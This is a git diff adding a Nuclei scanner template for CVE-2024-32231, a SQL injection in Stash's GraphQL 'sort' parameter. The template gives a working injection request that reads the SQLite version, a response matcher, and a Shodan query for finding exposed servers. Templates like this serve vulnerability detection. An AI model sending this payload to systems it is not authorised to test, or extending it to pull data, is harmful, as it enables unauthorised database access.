diff --git a/http/cves/2024/CVE-2024-32231.yaml b/http/cves/2024/CVE-2024-32231.yaml
new file mode 100644
index 00000000000..08c2c1e66ec
--- /dev/null
+++ b/http/cves/2024/CVE-2024-32231.yaml
@@ -0,0 +1,46 @@
+id: CVE-2024-32231
+
+info:
+ name: Stash < 0.26.0 - SQL Injection
+ author: iamnoooob,rootxharsh,pdresearch
+ severity: critical
+ description: |
+ Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.
+ reference:
+ - https://github.com/stashapp
+ - https://github.com/stashapp/stash
+ - https://github.com/stashapp/stash/pull/4865
+ - https://github.com/advisories/GHSA-75jf-52jg-qqh4
+ classification:
+ epss-score: 0.00045
+ epss-percentile: 0.16348
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: html:"
Stash"
+ tags: cve,cve2024,stash,sqli
+
+http:
+ - raw:
+ - |
+ POST /graphql HTTP/1.1
+ Host: {{Hostname}}
+ Content-type: application/json
+
+ {"operationName":"FindPerformers","variables":{"filter":{"q":"","page":1,"per_page":40,"sort":"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -","direction":"ASC"},"performer_filter":{}},"query":"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\n findPerformers(\n filter: $filter\n performer_filter: $performer_filter\n performer_ids: $performer_ids\n ) {\n count\n performers {\n ...PerformerData\n __typename\n }\n __typename\n }\n}\n\nfragment PerformerData on Performer {\n id\n name\n disambiguation\n url\n gender\n twitter\n instagram\n birthdate\n ethnicity\n country\n eye_color\n height_cm\n measurements\n fake_tits\n penis_length\n circumcised\n career_length\n tattoos\n piercings\n alias_list\n favorite\n ignore_auto_tag\n image_path\n scene_count\n image_count\n gallery_count\n movie_count\n performer_count\n o_counter\n tags {\n ...SlimTagData\n __typename\n }\n stash_ids {\n stash_id\n endpoint\n __typename\n }\n rating100\n details\n death_date\n hair_color\n weight\n __typename\n}\n\nfragment SlimTagData on Tag {\n id\n name\n aliases\n image_path\n parent_count\n child_count\n __typename\n}"}
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'converting driver\.Value type string \(\\"3.*?\\"\) to a int: invalid syntax'
+
+ - type: word
+ part: content_type
+ words:
+ - "application/json"
+
+ - type: status
+ status:
+ - 200